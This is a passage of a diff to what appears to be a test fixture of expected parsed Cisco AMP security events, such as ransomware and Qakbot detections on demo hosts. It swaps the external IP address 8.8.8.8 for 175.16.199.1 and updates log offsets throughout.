         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -129,7 +129,7 @@
         "@timestamp": "2021-01-14T17:39:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -163,7 +163,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 2708,
+        "log.offset": 2718,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -172,7 +172,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -184,7 +184,7 @@
         "@timestamp": "2021-01-14T17:39:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -222,7 +222,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 3893,
+        "log.offset": 3908,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -231,7 +231,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -247,7 +247,7 @@
         "@timestamp": "2021-01-14T17:39:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -288,7 +288,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 5147,
+        "log.offset": 5167,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -304,7 +304,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -320,7 +320,7 @@
         "@timestamp": "2021-01-14T17:39:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -361,7 +361,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 6745,
+        "log.offset": 6770,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -377,7 +377,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -393,7 +393,7 @@
         "@timestamp": "2021-01-14T17:39:49.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -425,7 +425,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 8343,
+        "log.offset": 8373,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -434,7 +434,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -446,7 +446,7 @@
         "@timestamp": "2021-01-14T16:59:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -480,7 +480,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 9463,
+        "log.offset": 9498,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -489,7 +489,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -501,7 +501,7 @@
         "@timestamp": "2021-01-14T16:59:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -541,7 +541,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 10645,
+        "log.offset": 10685,
         "related.hash": [
             "6894b3834bd541fa85df79e44568acac",
             "8cf0ca99a8f5019d8583133b9a9379299c45470c",
@@ -552,7 +552,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -568,7 +568,7 @@
         "@timestamp": "2021-01-14T16:59:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -608,7 +608,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 12021,
+        "log.offset": 12066,
         "related.hash": [
             "6894b3834bd541fa85df79e44568acac",
             "8cf0ca99a8f5019d8583133b9a9379299c45470c",
@@ -619,7 +619,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -635,7 +635,7 @@
         "@timestamp": "2021-01-14T16:59:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -667,7 +667,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 13397,
+        "log.offset": 13447,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -676,7 +676,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -688,7 +688,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -722,7 +722,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 14506,
+        "log.offset": 14561,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -731,7 +731,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -743,7 +743,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -777,7 +777,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 15718,
+        "log.offset": 15778,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -786,7 +786,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -798,7 +798,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -832,7 +832,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 16930,
+        "log.offset": 16995,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -841,7 +841,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -853,7 +853,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -885,7 +885,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 18142,
+        "log.offset": 18212,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -894,7 +894,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -906,7 +906,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -944,7 +944,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 19266,
+        "log.offset": 19341,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -953,7 +953,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -965,7 +965,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1005,7 +1005,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 20509,
+        "log.offset": 20589,
         "related.hash": [
             "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
             "7bf2b57f2a205768755c07f238fb32cc",
@@ -1016,7 +1016,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1028,7 +1028,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1066,7 +1066,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 21869,
+        "log.offset": 21954,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -1075,7 +1075,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1087,7 +1087,7 @@
         "@timestamp": "2021-01-14T16:55:47.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1125,7 +1125,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 23112,
+        "log.offset": 23202,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -1134,7 +1134,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1146,7 +1146,7 @@
         "@timestamp": "2021-01-14T16:55:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1180,7 +1180,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 24355,
+        "log.offset": 24450,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -1189,7 +1189,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1201,7 +1201,7 @@
         "@timestamp": "2021-01-14T16:55:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1233,7 +1233,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 25559,
+        "log.offset": 25659,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -1242,7 +1242,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1254,7 +1254,7 @@
         "@timestamp": "2021-01-14T16:55:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1294,7 +1294,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 26683,
+        "log.offset": 26788,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
             "54a116ff80df6e6031059fc3036464df",
@@ -1305,7 +1305,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1317,7 +1317,7 @@
         "@timestamp": "2021-01-14T16:55:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1357,7 +1357,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 28003,
+        "log.offset": 28113,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
             "54a116ff80df6e6031059fc3036464df",
@@ -1368,7 +1368,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1380,7 +1380,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1414,7 +1414,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 29323,
+        "log.offset": 29438,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -1423,7 +1423,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1435,7 +1435,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1469,7 +1469,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 30524,
+        "log.offset": 30644,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -1478,7 +1478,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1490,7 +1490,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1524,7 +1524,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 31725,
+        "log.offset": 31850,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -1533,7 +1533,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1545,7 +1545,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1583,7 +1583,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 32926,
+        "log.offset": 33056,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -1592,7 +1592,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1604,7 +1604,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1642,7 +1642,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 34182,
+        "log.offset": 34317,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -1651,7 +1651,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1663,7 +1663,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1703,7 +1703,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 35438,
+        "log.offset": 35578,
         "related.hash": [
             "32c9e6737dbdcbfb7563a3f27e2b1571",
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
@@ -1714,7 +1714,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1726,7 +1726,7 @@
         "@timestamp": "2021-01-14T16:35:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1766,7 +1766,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 36775,
+        "log.offset": 36920,
         "related.hash": [
             "2f99e3456dc1d26f77c52b2119fde92f",
             "92673dd0e5f4a094fa6cd57bb301f884f2289f6c",
@@ -1777,7 +1777,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1895,7 +1895,7 @@
         "cisco.amp.bp_data.type": "activity",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1927,13 +1927,13 @@
         "host.hostname": "Demo_BP_WMIPRVSE",
         "host.name": "Demo_BP_WMIPRVSE",
         "input.type": "log",
-        "log.offset": 38130,
+        "log.offset": 38280,
         "related.hosts": [
             "Demo_BP_WMIPRVSE"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1945,7 +1945,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1979,7 +1979,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 68391,
+        "log.offset": 68546,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1988,7 +1988,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2000,7 +2000,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2034,7 +2034,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 69603,
+        "log.offset": 69763,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2043,7 +2043,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2055,7 +2055,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2089,7 +2089,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 70815,
+        "log.offset": 70980,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2098,7 +2098,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2110,7 +2110,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2144,7 +2144,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 72027,
+        "log.offset": 72197,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2153,7 +2153,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2165,7 +2165,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2203,7 +2203,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 73239,
+        "log.offset": 73414,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2212,7 +2212,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2224,7 +2224,7 @@
         "@timestamp": "2021-01-14T15:50:23.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2262,7 +2262,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 74476,
+        "log.offset": 74656,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2271,7 +2271,7 @@
         ],
         "related.ip": [
